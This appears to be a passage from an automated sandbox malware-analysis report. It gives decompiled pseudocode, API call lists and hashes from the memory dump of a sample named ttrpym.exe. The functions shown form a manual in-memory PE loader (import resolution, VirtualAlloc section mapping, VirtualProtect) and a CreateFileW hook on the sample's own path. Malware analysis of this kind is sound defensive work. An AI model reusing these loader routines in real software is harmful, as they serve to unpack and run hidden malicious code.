                                                                                                                        0x00000000
                                                                                                                        0x0040548a
                                                                                                                        0x00405462
                                                                                                                        0x0040543b
                                                                                                                        0x00000000
                                                                                                                        0x00405419
                                                                                                                        0x004054d2
                                                                                                                        0x004054d2
                                                                                                                        0x004053f3
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,89FFFFFF,00401DAE,00000000,?,00405636,00000000,?,?,?,?,00401DAE,?), ref: 004053EB
                                                                                                                        • LoadLibraryA.KERNEL32(?,?,00405636,00000000,?,?,?,?,00401DAE,?), ref: 0040540E
                                                                                                                        • _realloc.LIBCMT ref: 0040542E
                                                                                                                          • Part of subcall function 0040EB37: _malloc.LIBCMT ref: 0040EB4D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405473
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00405636,00000000,?,?,?,?,00401DAE,?), ref: 0040549A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$AddressLibraryLoadProc_malloc_realloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3858321205-0
                                                                                                                        • Opcode ID: ba75fad5814da8645300297398679ffc7915939886460a30281cd22e6299f0ab
                                                                                                                        • Instruction ID: d5ea892b97493d099cb7b2a7e0e9e3205861eb97d20455837cb6fc0762b2b167
                                                                                                                        • Opcode Fuzzy Hash: ba75fad5814da8645300297398679ffc7915939886460a30281cd22e6299f0ab
                                                                                                                        • Instruction Fuzzy Hash: 2D31DE726007168FD7208F29DC80BA7B7A4FF44326F15463AE915E7381E739E854CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 66%
                                                                                                                        			E00402D90(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t12;
                                                                                                                        				void* _t21;
                                                                                                                        				int _t25;
                                                                                                                        				void* _t30;
                                                                                                                        				int _t32;
                                                                                                                        				char* _t35;
                                                                                                                        
                                                                                                                        				_t21 = __edx;
                                                                                                                        				_t35 = _a4;
                                                                                                                        				_t17 = __ecx;
                                                                                                                        				if(_t35 != 0) {
                                                                                                                        					_t25 = lstrlenA(_t35) + 1;
                                                                                                                        					E00402C50(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                        					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                        					asm("sbb esi, esi");
                                                                                                                        					_t30 =  ~_t12 + 1;
                                                                                                                        					if(_t30 != 0) {
                                                                                                                        						_t12 = GetLastError();
                                                                                                                        						if(_t12 == 0x7a) {
                                                                                                                        							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                        							E00402C50(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                        							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                        							asm("sbb esi, esi");
                                                                                                                        							_t30 =  ~_t12 + 1;
                                                                                                                        						}
                                                                                                                        						if(_t30 != 0) {
                                                                                                                        							_t12 = E00401030();
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					return _t12;
                                                                                                                        				} else {
                                                                                                                        					 *__ecx = _t35;
                                                                                                                        					return __eax;
                                                                                                                        				}
                                                                                                                        			}











                                                                                                                        0x00402d90
                                                                                                                        0x00402d92
                                                                                                                        0x00402d96
                                                                                                                        0x00402d9a
                                                                                                                        0x00402db7
                                                                                                                        0x00402dba
                                                                                                                        0x00402dcf
                                                                                                                        0x00402dd9
                                                                                                                        0x00402ddb
                                                                                                                        0x00402dde
                                                                                                                        0x00402de0
                                                                                                                        0x00402de9
                                                                                                                        0x00402dfe
                                                                                                                        0x00402e0b
                                                                                                                        0x00402e20
                                                                                                                        0x00402e2a
                                                                                                                        0x00402e2c
                                                                                                                        0x00402e2c
                                                                                                                        0x00402e2f
                                                                                                                        0x00402e31
                                                                                                                        0x00402e31
                                                                                                                        0x00402e2f
                                                                                                                        0x00402e3a
                                                                                                                        0x00402d9c
                                                                                                                        0x00402d9c
                                                                                                                        0x00402da0
                                                                                                                        0x00402da0

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,00402F16,!@,00000003,?,0040210D,?), ref: 00402DA6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001,00000003,?,0040210D,?), ref: 00402DCF
                                                                                                                        • GetLastError.KERNEL32(?,0040210D,?), ref: 00402DE0
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000,?,0040210D,?), ref: 00402DF8
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000,?,?,?,?,?,?,0040210D,?), ref: 00402E20
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3322701435-0
                                                                                                                        • Opcode ID: 2aa08fb6b6da8d238293cb9aff5cf094fc9b027109ce00417c36bcc6a805862d
                                                                                                                        • Instruction ID: e849e6f5357eddbb594fdc98ee0711563944c1755324f5bc9fe43ff7a850603f
                                                                                                                        • Opcode Fuzzy Hash: 2aa08fb6b6da8d238293cb9aff5cf094fc9b027109ce00417c36bcc6a805862d
                                                                                                                        • Instruction Fuzzy Hash: FB118E71540224BBD230AA25CC8CF677F6CDB86BA5F008569FA55AA2C1C775E904C6F8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E0040E9C8(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                        				signed int _v0;
                                                                                                                        				char _v16;
                                                                                                                        				void* _t13;
                                                                                                                        				signed int _t14;
                                                                                                                        				signed int _t18;
                                                                                                                        				signed int _t20;
                                                                                                                        				void* _t21;
                                                                                                                        				void* _t22;
                                                                                                                        				signed int _t23;
                                                                                                                        				signed int _t25;
                                                                                                                        				void* _t28;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t39;
                                                                                                                        				signed int _t41;
                                                                                                                        				void* _t45;
                                                                                                                        
                                                                                                                        				_t37 = __edi;
                                                                                                                        				_t36 = __edx;
                                                                                                                        				_t28 = __ebx;
                                                                                                                        				while(1) {
                                                                                                                        					_t13 = E0040DFE9(_t28, _t36, _t37, _a4); // executed
                                                                                                                        					if(_t13 != 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t14 = E004114B7(_a4);
                                                                                                                        					__eflags = _t14;
                                                                                                                        					if(_t14 == 0) {
                                                                                                                        						__eflags =  *0x4237e0 & 0x00000001;
                                                                                                                        						if(( *0x4237e0 & 0x00000001) == 0) {
                                                                                                                        							 *0x4237e0 =  *0x4237e0 | 0x00000001;
                                                                                                                        							__eflags =  *0x4237e0;
                                                                                                                        							E0040E95E(0x4237d4);
                                                                                                                        							E00411CF1( *0x4237e0, 0x41a66b);
                                                                                                                        						}
                                                                                                                        						E0040E9AB( &_v16, 0x4237d4);
                                                                                                                        						E00411D08( &_v16, 0x420f1c);
                                                                                                                        						asm("int3");
                                                                                                                        						__eflags =  *0x4253c8;
                                                                                                                        						_push(0x4237d4);
                                                                                                                        						_t41 =  *0x423960; // 0x12f1860
                                                                                                                        						if( *0x4253c8 != 0) {
                                                                                                                        							_push(_t37);
                                                                                                                        							__eflags = _t41;
                                                                                                                        							if(_t41 != 0) {
                                                                                                                        								L13:
                                                                                                                        								__eflags = _v0;
                                                                                                                        								if(_v0 != 0) {
                                                                                                                        									_t39 = E00411EF0(_v0);
                                                                                                                        									while(1) {
                                                                                                                        										_t20 =  *_t41;
                                                                                                                        										__eflags = _t20;
                                                                                                                        										if(_t20 == 0) {
                                                                                                                        											goto L20;
                                                                                                                        										}
                                                                                                                        										_t21 = E00411EF0(_t20);
                                                                                                                        										__eflags = _t21 - _t39;
                                                                                                                        										if(_t21 <= _t39) {
                                                                                                                        											L18:
                                                                                                                        											_t41 = _t41 + 4;
                                                                                                                        											__eflags = _t41;
                                                                                                                        											continue;
                                                                                                                        										} else {
                                                                                                                        											_t22 =  *_t41;
                                                                                                                        											__eflags =  *((char*)(_t22 + _t39)) - 0x3d;
                                                                                                                        											if( *((char*)(_t22 + _t39)) != 0x3d) {
                                                                                                                        												goto L18;
                                                                                                                        											} else {
                                                                                                                        												_t23 = E00411EC9(_t22, _v0, _t39);
                                                                                                                        												_t45 = _t45 + 0xc;
                                                                                                                        												__eflags = _t23;
                                                                                                                        												if(_t23 == 0) {
                                                                                                                        													_t18 =  *_t41 + _t39 + 1;
                                                                                                                        												} else {
                                                                                                                        													goto L18;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										goto L21;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L20;
                                                                                                                        							} else {
                                                                                                                        								__eflags =  *0x423968 - _t41; // 0x0
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									L20:
                                                                                                                        									_t18 = 0;
                                                                                                                        									__eflags = 0;
                                                                                                                        								} else {
                                                                                                                        									_t25 = E00411F7B(_t36);
                                                                                                                        									__eflags = _t25;
                                                                                                                        									if(_t25 != 0) {
                                                                                                                        										goto L20;
                                                                                                                        									} else {
                                                                                                                        										_t41 =  *0x423960; // 0x12f1860
                                                                                                                        										__eflags = _t41;
                                                                                                                        										if(_t41 == 0) {
                                                                                                                        											goto L20;
                                                                                                                        										} else {
                                                                                                                        											goto L13;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							L21:
                                                                                                                        						} else {
                                                                                                                        							_t18 = 0;
                                                                                                                        						}
                                                                                                                        						return _t18;
                                                                                                                        					} else {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					L24:
                                                                                                                        				}
                                                                                                                        				return _t13;
                                                                                                                        				goto L24;
                                                                                                                        			}



















                                                                                                                        0x0040e9c8
                                                                                                                        0x0040e9c8
                                                                                                                        0x0040e9c8
                                                                                                                        0x0040e9df
                                                                                                                        0x0040e9e2
                                                                                                                        0x0040e9ea
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040e9d5
                                                                                                                        0x0040e9db
                                                                                                                        0x0040e9dd
                                                                                                                        0x0040e9ee
                                                                                                                        0x0040e9fa
                                                                                                                        0x0040e9fc
                                                                                                                        0x0040e9fc
                                                                                                                        0x0040ea05
                                                                                                                        0x0040ea0f
                                                                                                                        0x0040ea14
                                                                                                                        0x0040ea19
                                                                                                                        0x0040ea27
                                                                                                                        0x0040ea2c
                                                                                                                        0x0040ea32
                                                                                                                        0x0040ea39
                                                                                                                        0x0040ea3a
                                                                                                                        0x0040ea40
                                                                                                                        0x0040ea46
                                                                                                                        0x0040ea47
                                                                                                                        0x0040ea49
                                                                                                                        0x0040ea66
                                                                                                                        0x0040ea66
                                                                                                                        0x0040ea6a
                                                                                                                        0x0040ea75
                                                                                                                        0x0040eaa0
                                                                                                                        0x0040eaa0
                                                                                                                        0x0040eaa2
                                                                                                                        0x0040eaa4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040ea7a
                                                                                                                        0x0040ea80
                                                                                                                        0x0040ea82
                                                                                                                        0x0040ea9d
                                                                                                                        0x0040ea9d
                                                                                                                        0x0040ea9d
                                                                                                                        0x00000000
                                                                                                                        0x0040ea84
                                                                                                                        0x0040ea84
                                                                                                                        0x0040ea86
                                                                                                                        0x0040ea8a
                                                                                                                        0x00000000
                                                                                                                        0x0040ea8c
                                                                                                                        0x0040ea91
                                                                                                                        0x0040ea96
                                                                                                                        0x0040ea99
                                                                                                                        0x0040ea9b
                                                                                                                        0x0040eaae
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040ea9b
                                                                                                                        0x0040ea8a
                                                                                                                        0x00000000
                                                                                                                        0x0040ea82
                                                                                                                        0x0040eaa0
                                                                                                                        0x00000000
                                                                                                                        0x0040ea4b
                                                                                                                        0x0040ea4b
                                                                                                                        0x0040ea51
                                                                                                                        0x0040eaa6
                                                                                                                        0x0040eaa6
                                                                                                                        0x0040eaa6
                                                                                                                        0x0040ea53
                                                                                                                        0x0040ea53
                                                                                                                        0x0040ea58
                                                                                                                        0x0040ea5a
                                                                                                                        0x00000000
                                                                                                                        0x0040ea5c
                                                                                                                        0x0040ea5c
                                                                                                                        0x0040ea62
                                                                                                                        0x0040ea64
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040ea64
                                                                                                                        0x0040ea5a
                                                                                                                        0x0040ea51
                                                                                                                        0x0040eaa8
                                                                                                                        0x0040ea42
                                                                                                                        0x0040ea42
                                                                                                                        0x0040ea42
                                                                                                                        0x0040eaab
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040e9dd
                                                                                                                        0x0040e9ed
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040E9E2
                                                                                                                          • Part of subcall function 0040DFE9: __FF_MSGBANNER.LIBCMT ref: 0040E00C
                                                                                                                          • Part of subcall function 0040DFE9: __NMSG_WRITE.LIBCMT ref: 0040E013
                                                                                                                          • Part of subcall function 0040DFE9: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00414D74,00000001,00000001,00000001,?,004101FE,00000018,00421158,0000000C,0041028F), ref: 0040E060
                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040EA05
                                                                                                                          • Part of subcall function 0040E95E: std::exception::exception.LIBCMT ref: 0040E96A
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040EA19
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EA27
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1411284514-0
                                                                                                                        • Opcode ID: a5f85bbceda087547e4e1f4cb1a01cc270276f4e05f1b5642957b39d270b0259
                                                                                                                        • Instruction ID: fe163c5bcfbbff610385fb7c2169ce8031ee546abf50f098d9841e9ad0292232
                                                                                                                        • Opcode Fuzzy Hash: a5f85bbceda087547e4e1f4cb1a01cc270276f4e05f1b5642957b39d270b0259
                                                                                                                        • Instruction Fuzzy Hash: 4BF0E2B1B0010966CF04B763FC0398A7B649F80758B14883BBD01B11E2DF7EDA62868D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004051E0() {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				intOrPtr* _t16;
                                                                                                                        				intOrPtr _t17;
                                                                                                                        				long _t18;
                                                                                                                        				void* _t19;
                                                                                                                        				intOrPtr* _t21;
                                                                                                                        				long _t23;
                                                                                                                        				void* _t27;
                                                                                                                        				void* _t30;
                                                                                                                        				intOrPtr _t41;
                                                                                                                        				long* _t43;
                                                                                                                        				void* _t45;
                                                                                                                        				void* _t46;
                                                                                                                        
                                                                                                                        				_t16 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                                        				_t41 =  *((intOrPtr*)(_t16 + 4));
                                                                                                                        				_t17 =  *_t16;
                                                                                                                        				_t45 = 0;
                                                                                                                        				_t30 = ( *(_t17 + 0x14) & 0x0000ffff) + _t17 + 0x18;
                                                                                                                        				if(0 <  *((intOrPtr*)(_t17 + 6))) {
                                                                                                                        					_t27 = VirtualAlloc;
                                                                                                                        					_t43 = _t30 + 0x10;
                                                                                                                        					do {
                                                                                                                        						_t18 =  *_t43;
                                                                                                                        						if(_t18 != 0) {
                                                                                                                        							_t19 = VirtualAlloc( *((intOrPtr*)(_t43 - 4)) + _t41, _t18, 0x1000, 4); // executed
                                                                                                                        							E0040E0C0(_t27, _t41, _t43, _t19, _t43[1] +  *((intOrPtr*)(_t46 + 0x14)),  *_t43);
                                                                                                                        							L6:
                                                                                                                        							_t46 = _t46 + 0xc;
                                                                                                                        							goto L7;
                                                                                                                        						}
                                                                                                                        						_t23 =  *( *((intOrPtr*)(_t46 + 0x18)) + 0x38);
                                                                                                                        						if(_t23 <= 0) {
                                                                                                                        							goto L7;
                                                                                                                        						}
                                                                                                                        						E0040E430(_t41, VirtualAlloc( *((intOrPtr*)(_t43 - 4)) + _t41, _t23, 0x1000, 4), 0, _t23);
                                                                                                                        						goto L6;
                                                                                                                        						L7:
                                                                                                                        						_t21 =  *((intOrPtr*)(_t46 + 0x1c));
                                                                                                                        						_t45 = _t45 + 1;
                                                                                                                        						_t43 =  &(_t43[0xa]);
                                                                                                                        					} while (_t45 < ( *( *_t21 + 6) & 0x0000ffff));
                                                                                                                        					return _t21;
                                                                                                                        				}
                                                                                                                        				return _t17;
                                                                                                                        			}


















                                                                                                                        0x004051e0
                                                                                                                        0x004051e6
                                                                                                                        0x004051e9
                                                                                                                        0x004051f1
                                                                                                                        0x004051f3
                                                                                                                        0x004051fb
                                                                                                                        0x004051fe
                                                                                                                        0x00405205
                                                                                                                        0x00405208
                                                                                                                        0x00405208
                                                                                                                        0x0040520c
                                                                                                                        0x00405242
                                                                                                                        0x00405250
                                                                                                                        0x00405255
                                                                                                                        0x00405255
                                                                                                                        0x00000000
                                                                                                                        0x00405255
                                                                                                                        0x00405212
                                                                                                                        0x00405217
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040522d
                                                                                                                        0x00000000
                                                                                                                        0x00405258
                                                                                                                        0x00405258
                                                                                                                        0x00405262
                                                                                                                        0x00405263
                                                                                                                        0x00405266
                                                                                                                        0x00000000
                                                                                                                        0x0040526b
                                                                                                                        0x0040526e

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(?,000000D9,00001000,00000004,00000000,000000D9,00000000,00000000,89FFFFFF,00401DAE,0040561B,00401DAE,89FFFFFF,00000000,00000000,00401DAE), ref: 0040522A
                                                                                                                        • _memset.LIBCMT ref: 0040522D
                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,00000000,89FFFFFF,00401DAE,0040561B,00401DAE,89FFFFFF,00000000,00000000,00401DAE,?), ref: 00405242
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual$_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1876456587-0
                                                                                                                        • Opcode ID: 196c75b8a8e267e4806b6442ffe4bc439e6027dbbe9d05606222a8196ddbe102
                                                                                                                        • Instruction ID: 5abe8866e73eec10d11d9c15e299d5044fe40b74fc020eff72ed462cb95803b4
                                                                                                                        • Opcode Fuzzy Hash: 196c75b8a8e267e4806b6442ffe4bc439e6027dbbe9d05606222a8196ddbe102
                                                                                                                        • Instruction Fuzzy Hash: 2B115EB5240200AFD324DF96DC84F67B3E9EFC8714B14885DF645AB291D675EC41CB64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 87%
                                                                                                                        			E004010D0(WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
                                                                                                                        				WCHAR* _t11;
                                                                                                                        				void* _t14;
                                                                                                                        				WCHAR* _t15;
                                                                                                                        				char* _t16;
                                                                                                                        				short _t19;
                                                                                                                        				short _t22;
                                                                                                                        				WCHAR* _t23;
                                                                                                                        
                                                                                                                        				_t23 = _a4;
                                                                                                                        				_t16 = L"C:\\Users\\frontdesk\\Desktop\\ttrpym.exe";
                                                                                                                        				_t11 = _t23;
                                                                                                                        				while(1) {
                                                                                                                        					_t19 =  *_t11;
                                                                                                                        					if(_t19 !=  *_t16) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					if(_t19 == 0) {
                                                                                                                        						L5:
                                                                                                                        						_t11 = 0;
                                                                                                                        					} else {
                                                                                                                        						_t22 = _t11[1];
                                                                                                                        						if(_t22 != _t16[2]) {
                                                                                                                        							break;
                                                                                                                        						} else {
                                                                                                                        							_t11 =  &(_t11[2]);
                                                                                                                        							_t16 =  &(_t16[4]);
                                                                                                                        							if(_t22 != 0) {
                                                                                                                        								continue;
                                                                                                                        							} else {
                                                                                                                        								goto L5;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L7:
                                                                                                                        					if(_t11 == 0) {
                                                                                                                        						_pop(_t23);
                                                                                                                        						_t15 =  *0x423184; // 0xf3f310
                                                                                                                        						_a4 = _t15;
                                                                                                                        						goto ( *0x4237d0);
                                                                                                                        					}
                                                                                                                        					_t14 = CreateFileW(_t23, _a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                        					return _t14;
                                                                                                                        				}
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				asm("sbb eax, 0xffffffff");
                                                                                                                        				goto L7;
                                                                                                                        			}










                                                                                                                        0x004010d1
                                                                                                                        0x004010d5
                                                                                                                        0x004010da
                                                                                                                        0x004010e0
                                                                                                                        0x004010e0
                                                                                                                        0x004010e6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004010eb
                                                                                                                        0x00401102
                                                                                                                        0x00401102
                                                                                                                        0x004010ed
                                                                                                                        0x004010ed
                                                                                                                        0x004010f5
                                                                                                                        0x00000000
                                                                                                                        0x004010f7
                                                                                                                        0x004010f7
                                                                                                                        0x004010fa
                                                                                                                        0x00401100
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401100
                                                                                                                        0x004010f5
                                                                                                                        0x0040110b
                                                                                                                        0x0040110d
                                                                                                                        0x0040110f
                                                                                                                        0x00401110
                                                                                                                        0x00401115
                                                                                                                        0x00401119
                                                                                                                        0x00401119
                                                                                                                        0x0040113e
                                                                                                                        0x00401145
                                                                                                                        0x00401145
                                                                                                                        0x00401106
                                                                                                                        0x00401108
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 0040113E
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\Desktop\ttrpym.exe, xrefs: 004010D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID: C:\Users\user\Desktop\ttrpym.exe
                                                                                                                        • API String ID: 823142352-321961137
                                                                                                                        • Opcode ID: 6de5dda7763aa2dd797a2bc5ac410260bca454c832065705ddf1a868c08e6396
                                                                                                                        • Instruction ID: 9c67e40f563f7f14195f56294d9d5260319f5e89579a379ee8b99830979e6a76
                                                                                                                        • Opcode Fuzzy Hash: 6de5dda7763aa2dd797a2bc5ac410260bca454c832065705ddf1a868c08e6396
                                                                                                                        • Instruction Fuzzy Hash: 5501BCB2604212ABD304CF14C8419A7B3F6EBBC350F40892AF985D73A4E335ED42C799
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405270() {
                                                                                                                        				intOrPtr* _t31;
                                                                                                                        				signed int _t32;
                                                                                                                        				signed char _t33;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        				signed int _t43;
                                                                                                                        				void* _t47;
                                                                                                                        				signed int _t48;
                                                                                                                        				signed int _t52;
                                                                                                                        				long _t54;
                                                                                                                        				signed char* _t58;
                                                                                                                        				unsigned int _t62;
                                                                                                                        				long _t63;
                                                                                                                        				void* _t66;
                                                                                                                        				void* _t68;
                                                                                                                        
                                                                                                                        				_t31 =  *((intOrPtr*)(_t68 + 0xc));
                                                                                                                        				_t38 =  *_t31;
                                                                                                                        				 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t31 + 4));
                                                                                                                        				_t66 = 0;
                                                                                                                        				_t32 = ( *(_t38 + 0x14) & 0x0000ffff) + _t38 + 0x18;
                                                                                                                        				if(0 >=  *(_t38 + 6)) {
                                                                                                                        					L16:
                                                                                                                        					return _t32;
                                                                                                                        				}
                                                                                                                        				_t58 = _t32 + 0x24;
                                                                                                                        				do {
                                                                                                                        					_t33 =  *_t58;
                                                                                                                        					_t43 = _t33 >> 0x0000001d & 0x00000001;
                                                                                                                        					_t52 = _t33 >> 0x0000001e & 0x00000001;
                                                                                                                        					_t62 = _t33 >> 0x1f;
                                                                                                                        					if((_t33 & 0x02000000) == 0) {
                                                                                                                        						_t63 =  *(0x422000 + (_t62 + (_t52 + _t43 * 2) * 2) * 4);
                                                                                                                        						__eflags = _t33 & 0x04000000;
                                                                                                                        						if((_t33 & 0x04000000) != 0) {
                                                                                                                        							_t63 = _t63 | 0x00000200;
                                                                                                                        							__eflags = _t63;
                                                                                                                        						}
                                                                                                                        						_t54 =  *(_t58 - 0x14);
                                                                                                                        						__eflags = _t54;
                                                                                                                        						if(__eflags != 0) {
                                                                                                                        							L12:
                                                                                                                        							if(__eflags > 0) {
                                                                                                                        								_t47 =  *((intOrPtr*)(_t58 - 0x18)) +  *((intOrPtr*)(_t68 + 0x10));
                                                                                                                        								__eflags = _t47;
                                                                                                                        								VirtualProtect(_t47, _t54, _t63, _t68 + 0x14); // executed
                                                                                                                        							}
                                                                                                                        							goto L14;
                                                                                                                        						} else {
                                                                                                                        							__eflags = _t33 & 0x00000040;
                                                                                                                        							if((_t33 & 0x00000040) == 0) {
                                                                                                                        								__eflags = _t33;
                                                                                                                        								if(_t33 >= 0) {
                                                                                                                        									goto L14;
                                                                                                                        								}
                                                                                                                        								_t48 =  *(_t38 + 0x24);
                                                                                                                        								L11:
                                                                                                                        								__eflags = _t48;
                                                                                                                        								goto L12;
                                                                                                                        							}
                                                                                                                        							_t48 =  *(_t38 + 0x20);
                                                                                                                        							goto L11;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					VirtualFree( *(_t58 - 0x1c),  *(_t58 - 0x14), 0x4000); // executed
                                                                                                                        					L14:
                                                                                                                        					_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x1c))));
                                                                                                                        					_t32 =  *(_t38 + 6) & 0x0000ffff;
                                                                                                                        					_t66 = _t66 + 1;
                                                                                                                        					_t58 =  &(_t58[0x28]);
                                                                                                                        				} while (_t66 < _t32);
                                                                                                                        				goto L16;
                                                                                                                        			}

















                                                                                                                        0x00405273
                                                                                                                        0x0040527b
                                                                                                                        0x00405281
                                                                                                                        0x00405288
                                                                                                                        0x0040528a
                                                                                                                        0x00405292
                                                                                                                        0x00405337
                                                                                                                        0x0040533c
                                                                                                                        0x0040533c
                                                                                                                        0x0040529a
                                                                                                                        0x004052a0
                                                                                                                        0x004052a0
                                                                                                                        0x004052ae
                                                                                                                        0x004052b1
                                                                                                                        0x004052b4
                                                                                                                        0x004052bc
                                                                                                                        0x004052d9
                                                                                                                        0x004052e0
                                                                                                                        0x004052e5
                                                                                                                        0x004052e7
                                                                                                                        0x004052e7
                                                                                                                        0x004052e7
                                                                                                                        0x004052ed
                                                                                                                        0x004052f2
                                                                                                                        0x004052f4
                                                                                                                        0x00405308
                                                                                                                        0x00405308
                                                                                                                        0x0040530d
                                                                                                                        0x0040530d
                                                                                                                        0x00405319
                                                                                                                        0x00405319
                                                                                                                        0x00000000
                                                                                                                        0x004052f6
                                                                                                                        0x004052f6
                                                                                                                        0x004052f8
                                                                                                                        0x004052ff
                                                                                                                        0x00405301
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405303
                                                                                                                        0x00405306
                                                                                                                        0x00405306
                                                                                                                        0x00000000
                                                                                                                        0x00405306
                                                                                                                        0x004052fa
                                                                                                                        0x00000000
                                                                                                                        0x004052fa
                                                                                                                        0x004052f4
                                                                                                                        0x004052cb
                                                                                                                        0x0040531f
                                                                                                                        0x00405323
                                                                                                                        0x00405325
                                                                                                                        0x00405329
                                                                                                                        0x0040532a
                                                                                                                        0x0040532d
                                                                                                                        0x00000000

                                                                                                                        APIs
